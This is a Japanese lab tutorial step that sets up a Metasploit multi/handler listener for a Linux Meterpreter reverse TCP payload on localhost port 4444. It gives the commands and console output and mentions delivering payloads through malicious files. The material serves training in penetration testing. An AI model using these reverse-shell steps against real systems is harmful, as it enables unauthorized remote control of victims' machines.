Meterpreter リスナーのセットアップ
最後のステップでは、Meterpreter ペイロード用のリスナーをセットアップする方法を学びます。Meterpreter は、ターゲットシステム上で対話型シェルを提供する、高度で機能豊富なペイロードです。エクスプロイトを直接実行する代わりに、exploit/multi/handler モジュールを使用して着信接続を待ち受けます。これは、エクスプロイトが他の手段(悪意のあるファイルなど)を通じて配信され、リバース接続をキャッチする必要がある場合に役立ちます。
まず、multi/handler モジュールに切り替えます。
use exploit/multi/handler
プロンプトが新しいモジュールを反映するように変化します。
msf6 exploit(multi/handler) >
次に、Meterpreter ペイロードを設定します。Linux システム用に設計されたものを使用します。ペイロード名 linux/x86/meterpreter/reverse_tcp は、<プラットフォーム>/<アーキテクチャ>/<タイプ>/<プロトコル> という論理的な構造に従っています。これは、Linux プラットフォーム、x86 アーキテクチャ、Meterpreter ペイロードタイプ、およびリバース TCP 接続プロトコルを指定しています。
set payload linux/x86/meterpreter/reverse_tcp
次に、以前と同様にリスナーオプション LHOST と LPORT を設定します。
set LHOST 127.0.0.1
注意: ループバックアドレスへのバインドに関する警告メッセージが表示される場合があります。これは localhost (127.0.0.1) を使用する場合の通常の動作であり、この実験では無視して問題ありません。
set LPORT 4444
最後に、exploit コマンドを使用してリスナーを開始します。
exploit
Metasploit は指定された IP とポートでリスナーを開始し、Meterpreter セッションが接続してくるのを待ちます。
[*] Started reverse TCP handler on 127.0.0.1:4444
コンソールはアクティブなまま、接続を待ち続けます。実際のシナリオでは、ターゲットマシンが対応する Meterpreter ペイロードを実行すると、ここでセッションが確立されます。この実験ではターゲットが接続してくることはないため、Ctrl + C を押してリスナーを停止できます。
Metasploit コンソールを終了するには、exit と入力し、Enter キーを押します。